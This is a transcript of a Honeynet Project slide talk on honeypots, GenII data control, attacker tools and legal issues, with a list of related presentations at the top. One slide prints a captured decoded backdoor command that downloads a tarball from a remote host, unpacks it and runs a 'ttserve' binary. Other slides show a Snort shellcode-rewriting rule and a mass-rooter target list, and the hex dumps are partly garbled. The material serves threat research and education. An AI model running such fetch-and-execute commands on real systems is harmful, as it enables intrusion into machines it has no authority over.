The Honeynet Project. Your Speakers The Team Members.

Slides:



Advertisements
Similar presentations
ETHICAL HACKING A LICENCE TO HACK
Advertisements

Honeynet Introduction Tang Chin Hooi APAN Secretariat.
HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.
AES Sub-Key Generation By Muhammad Naseem. Rotate Word 09CF4F3C.
TREx ESC Coordinator Training April Agenda Version 3.9 Enhancements – Transcript Request Interface – STAAR EOC Assessment Support New TREx Data.
Lynn Ray ISO Towson University Strategic Planning for IT Security Copyright Lynn Ray, This work is the intellectual property rights of the author.
Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.
HoneyPots Malware Class Presentation Xiang Yin, Zhanxiang Huang, Nguyet Nguyen November 2 nd 2004.
Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.
Aktueller Status How Hackers Cover Their Tracks ECE 4112 May 1st, 2007 Group 1 Chris Garyet Christopher Smith Introduction Lab Content Conclusions Questions.
Honeypots and Honeynets Source: The HoneyNet Project Book: Know Your Enemy (2 nd ed) Presented by: Mohammad.
1 Host Based Intrusion Detection: Analyzing System Logs Bob Winding, Vikram Ahmed University of Notre Dame 12/13/2006.
Honeynet/Honeypot Project - Leslie Cherian - Todd Deshane - Patty Jablonski - Creighton Long May 2, 2006.
Manuka project IEEE IA Workshop June 10, Agenda Introduction Inspiration to Solution Manuka Use SE Approach Conclusion.
PNW Honeynet Overview. Agenda What is a Honeynet What is the PNW Honeynet Alliance Who is involved in the project Where to get more information.
1 The Honeynet Project: Trapping the Hackers Lance Spitzner, Sun Microsystems Presented by Vikrant Karan.
Honeypot An instrument for attracting and detecting attackers Adapted from R. Baumann.
Network Infrastructure Security. LAN Security Local area networks facilitate the storage and retrieval of programs and data used by a group of people.
China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.
Introduction to Honeypot, Botnet, and Security Measurement
Protecting Mainframe and Distributed Corporate Data from FTP Attacks: Introducing FTP/Security Suite Alessandro Braccia, DBA Sistemi.
Lecture 10 Intrusion Detection modified from slides of Lawrie Brown.
HONEYPOT.  Introduction to Honeypot  Honeytoken  Types of Honeypots  Honeypot Implementation  Advantages and Disadvantages  Role of Honeypot in.
Automating Forensics. 2 Speaker Passion is honeypots. President, Honeynet Project Author Honeypots: Tracking and Co-Author Know Your Enemy. 8 Years in.
HoneyD (Part 2) Small Business NIDS This presentation demonstrates the ability for Small Businesses to emulate virtual operating systems and conduct.
Honeypots. Introduction A honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.
FORESEC Academy FORESEC Academy Security Essentials (II)
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
The Honeynet Project. Your Speaker Download this presentation from Kirby Kuehl Information Security Architect for Cisco Systems.
Honeypot and Intrusion Detection System
Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers.
Honeypots - An Overview By Lance Spitzner. Your Speaker  President, Honeypot Technologies Inc.  Founder, Honeynet Project & Moderator, honeypot mailing.
Honeypots and Honeynets A New Response to Cybercrime Analysis NAAG Seattle 04/14/03.
A Virtual Honeypot Framework Author: Niels Provos Published in: CITI Report 03-1 Presenter: Tao Li.
Honeynets Detecting Insider Threats Kirby Kuehl
1Of 25. 2Of 25  Definition  Advantages & Disadvantages  Types  Level of interaction  Honeyd project: A Virtual honeypot framework  Honeynet project:
HONEYPOTS PRESENTATION TEAM: TEAM: Ankur Sharma Ashish Agrawal Elly Bornstein Santak Bhadra Srinivas Natarajan.
Delivering e-Security Education through e-Learning V.K.Sharma Lakshmi Kalyani CDAC, Noida.
A Virtual Distributed Honeynet at KFUPM: A Case Study Build a high-interaction honeynet environment at KFUPM’s two main campuses: The students’ living.
A VIRTUAL HONEYPOT FRAMEWORK Author : Niels Provos Publication: Usenix Security Symposium Presenter: Hiral Chhaya for CAP6103.
CS555Spring 2012/Topic 101 Cryptography CS 555 Topic 10: Block Cipher Security & AES.
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 9 Performing Vulnerability Assessments.
Knowing What You Missed Forensic Techniques for Investigating Network Traffic.
Computing the chromatic number for block intersection graphs of Latin squares Ed Sykes CS 721 project McMaster University, December 2004 Slide 1.
1 HoneyNets. 2 Introduction Definition of a Honeynet Concept of Data Capture and Data Control Generation I vs. Generation II Honeynets Description of.
Chapter 11 – Counting Methods Intro to Counting Methods Section 11.1: Counting by Systematic Listing.
Honeypots Today & Tomorrow. Speaker Involved in information security for over 10 years, 4 with Sun Microsystems as Senior Security Architect. Founder.
1 HoneyNets, Intrusion Detection Systems, and Network Forensics.
Cryptography Lecture 17: Advanced Encryption Standard (AES) Piotr Faliszewski.
Module 12: Responding to Security Incidents. Overview Introduction to Auditing and Incident Response Designing an Audit Policy Designing an Incident Response.
AES Encryption FIPS 197, November 26, Bit Block Encryption Key Lengths 128, 192, 256 Number of Rounds Key Length Rounds Block.
ECE Prof. John A. Copeland fax Office: GCATT Bldg.
UNDER THE GUIDENCE OF: Mr.M.JAYANTHI RAO,M.Tech HOD OF IT. BY: I.ADITHYA(09511A1212) HONEYPOTS.
Using Honeypots to Improve Network Security Dr. Saleh Ibrahim Almotairi Research and Development Centre National Information Centre - Ministry of Interior.
Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.
Introduction to Computer Forensics Fall Computer Crime Computer crime is any criminal offense, activity or issue that involves computers (
SSL.
Sequential Pattern Mining
or call for office visit, or call Kathy Cheek,
Combinations COURSE 3 LESSON 11-3
The Advanced Encryption Standard: Rijndael
Honeypots and Honeynets
Make an Organized List and Simulate a Problem
12/6/2018 Honeypot ICT Infrastructure Sashan
Friday, December 07, 2018 Honeypot ICT Infrastructure Sashan Kantonsspital Graubunden ICT Department.
Rotors and Secret-Key Encryption
Honeypots.
Data Warehousing Mining & BI
A Series of Slides in 5 Parts Movement 2. BFS
刘振 上海交通大学 计算机科学与工程系 电信群楼3-509
Presentation transcript:

The Honeynet Project

Your Speakers The Team Members

Overview t The Honeynet Project t Honeynets t The Enemy t Learning More

Honeynet Project

The Honeynet Project t All volunteer organization of security professionals dedicated to researching cyber threats. t We do this by deploying networks around the world to be hacked.

Mission Statement To learn the tools, tactics, and motives of the blackhat community, and share the lessons learned.

Goals t Awareness: To raise awareness of the threats that exist. t Information: For those already aware, to teach and inform about the threats. t Research: To give organizations the capabilities to learn more on their own.

Project History The group informally began in April, 1999 as the [Wargames] maillist. Over time the group has grown, officially becoming the Honeynet Project in June, Currently in PhaseII of a three phase Project.

Value of the Project t Totally OpenSource, share all of our work, research and findings. t Everything we capture is happening in the wild, there is no theory. t Made up of security professionals from around the world. t We have no agenda, no employees, nor any product or service to sell.

Project Organization t Non-profit organization t Board of Directors t No more then two members from any organization. t Diverse set of skills and experiences. t Team works virtually, from around the world.

0 x 501C3

Honeynet Research Alliance Starting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying Honeynet technologies.

Alliance Members t South Florida HoneyNet Project t Nodal Intrusion Forensics Technology Initiative t SAIC Wireless Honeynet t netForensics Honeynet t Paladion Networks Honeynet Project (India) t Internet Systematics Lab Honeynet Project (Greece) t AT&T Mexico Honeynet (Mexico) t Honeynet.BR (Brazil)

Honeynets

Honeypots t A security resource who’s value lies in being probed, attacked or compromised. t Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise.

Advantages / Disadvantages t Advantages –Reduce false negatives and false positives –Collect little data, but data of high value –Minimal resources –Conceptually simple t Disadvantages –Limited field of view –Risk

What is a Honeynet t High-interaction honeypot. t Its an architecture, not a product or software. t Populate with live systems. t Once compromised, data is collected to learn the tools, tactics, and motives of the blackhat community.

How it works t A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed. t Any traffic entering or leaving the Honeynet is suspect by nature.

Honeynet Requirements t Data Control t Data Capture t Data Collection (for distributed Honeynets)

Honeynet - GenI

Honeynet - GenII t Easier to Deploy –Both Data Control and Data Capture on the same system. t Harder to Detect –Identify activity as opposed to counting connections. –Modify packets instead of blocking.

Honeynet - GenII

Data Control - GenII alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)

Virtual Honeynets All the elements of a Honeynet combined on a single physical system. Accomplished by running multiple instances of operating systems simultaneously. Examples include VMware and User Mode Linux. Virtual Honeynets can support both GenI and GenII technologies.

Wireless Honeynets Identify threats in space.

Distributed Honeynets

Possible Uses t Research –Early Warning and Prediction –Identify new tools and tactics –Profiling Blackhats t Testing an environment t Incident Response / Forensic Development

Early Warning & Prediction

New Tools

New Tactics

Blackhats J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting

Risk t Honeynets are highly complex, requiring extensive resources and manpower to properly maintain. t Honeynets are a high risk technology. As a high interaction honeypot, they can be used to attack or harm other non-Honeynet systems.

Legal Issues t Privacy t Entrapment t Liability

Privacy No single statute concerning privacy –Electronic Communication Privacy Act (18 USC ) –Federal Wiretap Statute (Title III, 18 USC ) –The Pen/Trap Statute (18 USC § )

Entrapment t Used only by defendant to avoid conviction. t Cannot be held criminally liable for ‘entrapment’. t Applies only to law enforcement t Even then, most legal authorities consider Honeynets non-entrapment.

Liability t Any organization may be liable if a Honeynet system is used to attack or damage other non-Honeynet systems. –Decided at state level, not federal –Civil issue, not criminal t This is why the Honeynet Project focuses so much attention on Data Control.

Legal Contact for.mil /.gov Department of Justice, Computer Crime and Intellectual Property Section –General Number: (202) –Specific Contact: Richard Salgado Direct Telephone (202)

The Enemy

Who am I?

The Threat is Active The blackhat community is extremely active. –20+ unique scans a day. –Fastest time honeypot manually compromised, 15 minutes (worm, 92 seconds). –Default RH 6.2, life expectancy is72 hours –100% - 900% increase of activity from 2000 to 2001 –Its only getting worse

Methodology Many blackhats randomly probe the Internet searching for a known vulnerability. Only 1 percent of systems may have this vulnerability. However, if you scan over 1 million systems, you can potentially hack into 10,000 computers.

Auto-rooter

Tools We have noticed the following trends. It appears the blackhat are not getting better, however their TOOLS are. –Automation (auto-rooters, mass-rooter, worms) –Backdoors / Remote control –Encryption (Trojaned ssh) –Kernel rootkits

TESO wu-ftpd mass-rooter 1 | Caldera eDesktop|OpenLinux 2.3 update[wu-ftpd OL.i386.rpm] 2 | Debian potato [wu-ftpd_ deb] 3 | Debian potato [wu-ftpd_ deb] 4 | Debian potato [wu-ftpd_ deb] 5 | Debian sid [wu-ftpd_ _i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd _StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd _imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd x.i386.rpm] 14 | RedHat 6.? [wu-ftpd i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd i386.rpm] 22 | SuSE 6.0|6.1 update wu [wuftpd i386.rpm] 23 | SuSE 6.2 update [wu-ftpd i386.rpm] 24 | SuSE 6.2 update [wuftpd i386.rpm] 25 | SuSE 6.2 update wu [wuftpd i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu [wuftpd.rpm]

02/19-04:34: > PROTO011 TTL:237 TOS:0x0 ID:13784 IpLen:20 DgmLen: B7 37 BA 3D B5 38 BB F BD = H D3 5D D9 62 EF 6B A2 F4 2B AE 3E C CD 57.].b.k..+.>.R..W DD 69 F2 6C E8 1F 8E 29 B4 3B 8C D A9 F6.i.l...).;...a.. 3B 84 CF 18 5D A5 EC 36 7B C B3 02 4B 91 ;...]..6{..d..K. 0E 94 1A 51 A6 DD 23 AE 32 B8 FF 7C CD 58...Q..#.2..|...X D6 67 9E F0 27 A1 1C A8 2F 66 B8 EF 7A.g..'..S.$./f..z F2 7B B2 F A D4 5A E0 25 B0 2E BF.{..... W.Z.%... F6 48 7F C4 0A AA 26 AF 3C B8 EF H.....&.<..Ax. 85 BC D BA 40 C6 0B A5 DC 67 7C F8 81 0E 8A DC F3 0A F 66 7D 94 AB C2 | !8Of}... D9 F0 07 1E 35 4C 63 7A 91 A8 BF D6 ED 04 1B Lcz E A5 BC D3 EA F 46 5D 74 8B A2 I`w /F]t.. B9 D0 E7 FE 15 2C 43 5A F B6 CD E4 FB ,CZq E 85 9C B3 CA E1 F8 0F 26 3D 54 6B B0 C7 DE F5 0C 23 3A F 96 AD C4 DB F #:Qh E 65 7C 93 AA C1 D8 EF 06 1D 34 4B 62. 7Ne| Kb A7 BE D5 EC 03 1A F 76 8D A4 BB D2 y H_v.... E E 45 5C 73 8A A1 B8 CF E6 FD 14 2B E\s B E B5 CC E3 FA F 56 6D 84 9B B2 Yp (?Vm... C9 E0 F7 0E 25 3C 53 6A AF C6 DD F4 0B %<Sj " E 95 AC C3 DA F1 08 1F 36 4D 64 7B 92 9Pg~ Md{. A9 C0 D7 EE 05 1C 33 4A F A6 BD D4 EB Jax E 75 8C A3 BA D1 E8 FF 16 2D 44 5B 72.0G^u D[r 89 A0 B7 CE E5 FC 13 2A F 86 9D B4 CB E *AXo..... F E 55 6C 83 9A B1 C8 DF F6 0D 24 3B 52..'>Ul $;R i. Encoded Backdoor Command

starting decode of packet size B7 37 BA 3D B5 38 BB F BD 48 D3 5D local buf of size B 69 6C 6C 61 6C 6C 20 2D killall -9 tts B 20 6C 79 6E D 73 6F 75 erve ; lynx -sou A 2F 2F E 31 rce E E 32 3A F 66 6F :8882/fo 6F 20 3E 20 2F 74 6D 70 2F 66 6F 6F 2E A o > /tmp/foo.tgz 20 3B F 74 6D B ; cd /tmp ; tar 20 2D A F 6F 2E A 20 3B -xvzf foo.tgz ; 20 2E 2F B D 20./ttserve ; rm 2D F 6F 2E A rf foo.tgz ttse B rve; B A A B1 BF E7 6F BF 1D 88 CB....j.9....o.... C5 FE $ Decoded Backdoor Command

Jargon File t A dictionary of commonly used hacker words or phrases. t A total of 1989 entries. t Broke these entries into 18 possible categories. t There were 354 words or phrases (17.8%) that were determined not to belong to any of the possible 18 categories, could not be combined with other unclassified items, or were classified as close synonyms for other words or phrases. t The remaining 1635 items were classified into at least one of eighteen different categories.

Thematic Analysis of Hacker Jargon File Note: Dictionary Entry May Be Coded in More Than One Category

Learning More

Additional Information t Challenges t Papers t Book

Challenges The Project offers you the opportunity to study real attacks on your own, compare your analysis to others, and learn about blackhats. –Scan of the Month challenges –Forensic Challenge –Reverse Challenge

Scan of the Month t Monthly challenge t Decode attacks from the wild t Over 20 scans and results archived

Forensic Challenge t In 2001 the community was challenged to fully analyze a hacked Linux computer. –Images and answers online. –Average time spent was 34 man hours on a 30 minute attack. –New tools: Brian Carrier developed TCT based tools autopsy and later TASK.

The Reverse Challenge t In 2002 the community was challenged to reverse a binary captured in the wild.

Know Your Enemy papers t Series of papers dedicated to Honeynet research and their findings. t Translated into over 10 different languages.

Know Your Enemy book t Book based on PhaseI of Honeynet Project research. t Published September, 2001 t 2nd edition coming

Conclusion t The Honeynet Project is a non-profit, all volunteer organization dedicated to researching cyber threats using Honeynet technologies, and sharing those lessons learned. t It is hoped our research ultimately improves the security of the Internet community.